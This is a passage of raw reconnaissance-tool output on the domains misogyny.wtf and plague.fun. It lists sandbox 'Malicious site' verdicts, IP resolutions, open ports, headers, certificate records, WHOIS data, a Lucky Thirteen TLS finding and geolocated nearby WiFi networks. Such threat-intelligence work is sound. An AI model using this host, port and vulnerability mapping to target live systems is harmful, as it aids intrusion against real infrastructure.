u'suspicious', u'submit_name': u'sample.url', u'sha256': u'5c3448839631ff707600d12453402fbbace2521dd1e872785d8ee8eee878ba5b', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 160, u'job_id': u'636be0dd0cfe2f70a43570f2', u'analysis_start_time': u'2022-11-09 17:18:22', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 17, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'e31c86e44c57d311805de20ac51706a74cd3959b0d645d22a185dacaec792dfd', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 120, u'job_id': u'634dbfec95271224d00deca3', u'analysis_start_time': u'2022-10-17 21:28:13', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 12, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'e31c86e44c57d311805de20ac51706a74cd3959b0d645d22a185dacaec792dfd', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 110, u'job_id': u'634d4888973c944fb14d16e1', u'analysis_start_time': u'2022-10-17 12:20:25', u'vx_family': u'Malicious site', u'av_detect': u'1', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 24, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'7527c614a3bbd76f67ca3e76e5d6f67b7d822fb2e9fdae63483b3546cce884e4', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 100, u'job_id': u'625e675051bb3857d50a9ff3', u'analysis_start_time': u'2022-04-19 07:40:02', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'e31c86e44c57d311805de20ac51706a74cd3959b0d645d22a185dacaec792dfd', u'type': None, u'type_short': u'url', u'size': 44}]} 188.114.96.3 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip Wavelan (Net ID: 00:02:2D:01:79:94) 37.780462,-122.390564 2022-12-18 00:32:21 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.148:443 195.110.124.0/24 2022-12-18 00:09:50 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.96.0 2022-12-18 00:07:06 Web Content Type No Web Spider 0 0 2 0 None text/html; charset=UTF-8 http://misogyny.wtf:2020/copy 2022-12-18 00:18:26 IP Address No DNS Resolver 19 0 2 0 None 81.88.48.101 mail.zerotwo-best-waifu.online 2022-12-18 00:02:50 IPv6 Address No Mnemonic PassiveDNS 13 0 1 0 None 2a06:98c1:3121::1 misogyny.wtf 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None http://obf.plague.fun plague.fun 2022-12-18 00:03:04 IP Address No DNS Resolver 0 0 1 0 None 20.226.83.185 misogyny.wtf 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.28.240 2022-12-18 00:08:30 IP Address No LeakIX 24 0 1 0 None 188.114.97.9 plague.fun 2022-12-18 00:23:00 Co-Hosted Site - Domain Name No SSL Certificate Analyzer 0 0 3 0 None amen.fr 81.88.48.102 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b092268ebf83d1-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.147.230 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet24CE (Net ID: 00:01:36:59:24:CC) 37.780462,-122.390564 2022-12-18 00:20:59 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3033::6815:1cf0:443 2606:4700:3033::6815:1cf0 2022-12-18 00:03:08 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun [{u'not_after': u'2023-02-02T13:11:40', u'not_before': u'2022-11-04T13:11:41', u'issuer_ca_id': 183267, u'name_value': u'atlas.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'atlas.plague.fun', u'serial_number': u'03f84007a92a29fa95e25feaf2e97579578e', u'entry_timestamp': u'2022-11-04T14:11:41.749', u'id': 7901805042}, {u'not_after': u'2023-02-02T13:11:40', u'not_before': u'2022-11-04T13:11:41', u'issuer_ca_id': 183267, u'name_value': u'atlas.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'atlas.plague.fun', u'serial_number': u'03f84007a92a29fa95e25feaf2e97579578e', u'entry_timestamp': u'2022-11-04T14:11:41.192', u'id': 7901776752}, {u'not_after': u'2023-01-28T20:43:45', u'not_before': u'2022-10-30T20:43:46', u'issuer_ca_id': 180753, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.plague.fun', u'serial_number': u'482040e9116c46fc13c8c69195a6d19b', u'entry_timestamp': u'2022-10-30T21:43:47.002', u'id': 7867480275}, {u'not_after': u'2023-01-28T18:19:30', u'not_before': u'2022-10-30T18:19:31', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'046bc55a1caade11253a85ac2746ac84c2a9', u'entry_timestamp': u'2022-10-30T19:19:32.251', u'id': 7866911231}, {u'not_after': u'2023-01-28T18:19:30', u'not_before': u'2022-10-30T18:19:31', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'046bc55a1caade11253a85ac2746ac84c2a9', u'entry_timestamp': u'2022-10-30T19:19:31.817', u'id': 7866912127}, {u'not_after': u'2023-01-21T15:38:17', u'not_before': u'2022-10-23T15:38:18', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'04d0d1a1cc7c20edeb01fc85dd45cce51bda', u'entry_timestamp': u'2022-10-23T16:38:19.446', u'id': 7820445958}, {u'not_after': u'2023-01-21T15:38:17', u'not_before': u'2022-10-23T15:38:18', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'04d0d1a1cc7c20edeb01fc85dd45cce51bda', u'entry_timestamp': u'2022-10-23T16:38:18.729', u'id': 7814082976}, {u'not_after': u'2023-01-04T20:16:47', u'not_before': u'2022-10-06T20:16:48', u'issuer_ca_id': 183267, u'name_value': u'hook.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'hook.plague.fun', u'serial_number': u'0443a47d291f150e6bac86e44bc0be6971a9', u'entry_timestamp': u'2022-10-06T21:16:48.99', u'id': 7712078353}, {u'not_after': u'2023-01-04T20:16:47', u'not_before': u'2022-10-06T20:16:48', u'issuer_ca_id': 183267, u'name_value': u'hook.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'hook.plague.fun', u'serial_number': u'0443a47d291f150e6bac86e44bc0be6971a9', u'entry_timestamp': u'2022-10-06T21:16:48.471', u'id': 7688527736}, {u'not_after': u'2022-11-30T20:47:44', u'not_before': u'2022-09-01T20:47:45', u'issuer_ca_id': 180753, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.plague.fun', u'serial_number': u'00e5465ab1fb4713cc0e4e814549c868c3', u'entry_timestamp': u'2022-09-01T21:47:46.013', u'id': 7454625821}, {u'not_after': u'2022-11-30T17:51:41', u'not_before': u'2022-09-01T17:51:42', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0308aa47534059b8a396dc9687a97a35d608', u'entry_timestamp': u'2022-09-01T18:51:42.953', u'id': 7453781460}, {u'not_after': u'2022-11-30T17:51:41', u'not_before': u'2022-09-01T17:51:42', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0308aa47534059b8a396dc9687a97a35d608', u'entry_timestamp': u'2022-09-01T18:51:42.314', u'id': 7453781860}, {u'not_after': u'2022-11-22T16:36:09', u'not_before': u'2022-08-24T16:36:10', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'03b5eeaa9fa9bb8686d85d7ec771cb57b527', u'entry_timestamp': u'2022-08-24T17:36:10.582', u'id': 7401145896}, {u'not_after': u'2022-11-22T16:36:09', u'not_before': u'2022-08-24T16:36:10', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'03b5eeaa9fa9bb8686d85d7ec771cb57b527', u'entry_timestamp': u'2022-08-24T17:36:10.4', u'id': 7401140134}, {u'not_after': u'2022-10-02T17:47:43', u'not_before': u'2022-07-04T17:47:44', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'04a499c76ccb8c6087124dac6daabc484646', u'entry_timestamp': u'2022-07-04T18:47:45.339', u'id': 7063588708}, {u'not_after': u'2022-10-02T17:47:43', u'not_before': u'2022-07-04T17:47:44', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'04a499c76ccb8c6087124dac6daabc484646', u'entry_timestamp': u'2022-07-04T18:47:45.085', u'id': 7060149773}, {u'not_after': u'2022-09-23T16:58:01', u'not_before': u'2022-06-25T16:58:02', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'042f49079093a806e6050c264050ef77d782', u'entry_timestamp': u'2022-06-25T17:58:03.347', u'id': 7007138023}, {u'not_after': u'2022-09-23T16:58:01', u'not_before': u'2022-06-25T16:58:02', u'issuer_ca_id': 183267, u'name_value': u'api.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'api.plague.fun', u'serial_number': u'042f49079093a806e6050c264050ef77d782', u'entry_timestamp': u'2022-06-25T17:58:02.892', u'id': 7004980687}, {u'not_after': u'2022-09-23T00:45:17', u'not_before': u'2022-06-25T00:45:18', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'030562a32a566ad6e7de855f24eefdd09c8a', u'entry_timestamp': u'2022-06-25T01:45:18.88', u'id': 7003478081}, {u'not_after': u'2022-09-23T00:45:17', u'not_before': u'2022-06-25T00:45:18', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'030562a32a566ad6e7de855f24eefdd09c8a', u'entry_timestamp': u'2022-06-25T01:45:18.601', u'id': 7001093209}, {u'not_after': u'2022-08-04T17:46:03', u'not_before': u'2022-05-06T17:46:04', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'03d81f4b915bd7bf2fbe6e278c6c60f68680', u'entry_timestamp': u'2022-05-06T18:46:04.241', u'id': 6677170444}, {u'not_after': u'2022-08-04T17:46:03', u'not_before': u'2022-05-06T17:46:04', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'03d81f4b915bd7bf2fbe6e278c6c60f68680', u'entry_timestamp': u'2022-05-06T18:46:04.096', u'id': 6677169275}, {u'not_after': u'2022-07-08T16:42:20', u'not_before': u'2022-04-09T16:42:21', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'035f2bc4e252acba5b55252b3c57780c6b4f', u'entry_timestamp': u'2022-04-09T17:42:21.905', u'id': 6510705122}, {u'not_after': u'2022-07-08T16:42:20', u'not_before': u'2022-04-09T16:42:21', u'issuer_ca_id': 183267, u'name_value': u'stream.plague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'stream.plague.fun', u'serial_number': u'035f2bc4e252acba5b55252b3c57780c6b4f', u'entry_timestamp': u'2022-04-09T17:42:21.739', u'id': 6510705589}, {u'not_after': u'2022-06-06T17:41:56', u'not_before': u'2022-03-08T17:41:57', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:58.165', u'id': 6305472947}, {u'not_after': u'2022-06-06T17:41:56', u'not_before': u'2022-03-08T17:41:57', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0454d1cf73f406da6736311b041911b70221', u'entry_timestamp': u'2022-03-08T18:41:57.451', u'id': 6305474316}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:28.385', u'id': 6305464280}, {u'not_after': u'2022-06-06T17:39:26', u'not_before': u'2022-03-08T17:39:27', u'issuer_ca_id': 183283, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.plague.fun', u'serial_number': u'0443e4fc51db2142a626a1af57d77c1f09d4', u'entry_timestamp': u'2022-03-08T18:39:27.978', u'id': 6305463915}, {u'not_after': u'2022-04-08T17:50:29', u'not_before': u'2022-01-08T17:50:30', u'issuer_ca_id': 183267, u'name_value': u'*.plague.fun\nplague.fun', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.plague.fun', u'serial_number': u'045042ff9a7a0aecdb51557918dd8fed52b0', u'entry_timestamp': u'2022-01 2022-12-18 00:09:34 Co-Hosted Site No HackerTarget 0 0 2 0 None eventmobilelegend22.cf 104.21.28.240 2022-12-18 00:18:04 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.0:8080 188.114.97.0/24 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ad9c563fea22f3-ORD Content-Encoding: gzip 172.67.147.230 2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b111e70f46faf6-DUS"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.190.129 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None role.davimoore.repl.co 34.149.204.188 2022-12-18 00:03:29 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3224.webapps.net 81.88.52.224 2022-12-18 00:22:04 Open TCP Port No Censys 0 0 2 0 None 90.116.166.104:50997 90.116.166.104 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None pancakes (Net ID: 00:00:48:67:6D:D1) 37.780462,-122.390564 2022-12-18 00:19:07 Country No Country Name Extractor 0 0 4 0 None Italy Florence, Tuscany, 52, Italy, IT 2022-12-18 00:21:13 Open TCP Port No Censys 0 0 2 0 None 188.114.97.0:2083 188.114.97.0 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +3544212434 Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:12:00 Raw Data from RIRs No ipapi.co 0 0 1 0 None {u'region_code': u'ZH', u'country_tld': u'.ch', u'ip': u'51.103.210.236', u'currency_name': u'Franc', u'currency': u'CHF', u'country_population': 8516543, u'country_code': u'CH', u'timezone': u'Europe/Zurich', u'city': u'Zurich', u'network': u'51.103.208.0/20', u'languages': u'de-CH,fr-CH,it-CH,rm', u'version': u'IPv4', u'latitude': 47.3682, u'in_eu': False, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Switzerland', u'country_capital': u'Bern', u'org': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'postal': u'8070', u'asn': u'AS8075', u'country': u'CH', u'region': u'Zurich', u'longitude': 8.5671, u'country_calling_code': u'+41', u'country_area': 41290.0, u'country_code_iso3': u'CHE'} 51.103.210.236 2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.97.3 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b3973358a52b45-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.0 2022-12-18 00:09:39 Co-Hosted Site No HackerTarget 0 0 2 0 None 66793246.com 172.67.147.230 2022-12-18 00:21:09 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a8befc7cae86aa-ORD Content-Encoding: gzip 188.114.96.0 2022-12-18 00:03:25 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:e2:2d:48:dd:4c:ac:71:43:1c:ff:e5:61:16:60:4c:1f:a4 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Oct 26 15:30:18 2020 GMT Not After : Jan 24 15:30:18 2021 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:eb:43:89:5d:2a:2b:fb:94:8a:04:2c:02:af:2a: 96:5b:3f:07:89:51:76:35:bf:db:b4:27:c7:db:3b: 22:5b:13:e2:bb:1a:ef:bd:f3:63:62:e1:9a:41:57: c7:e1:64:a6:3c:fb:73:f3:7e:8b:92:8b:36:7d:f5: 90:ef:19:3e:2a:70:e3:b1:1d:a8:a5:10:14:d9:44: 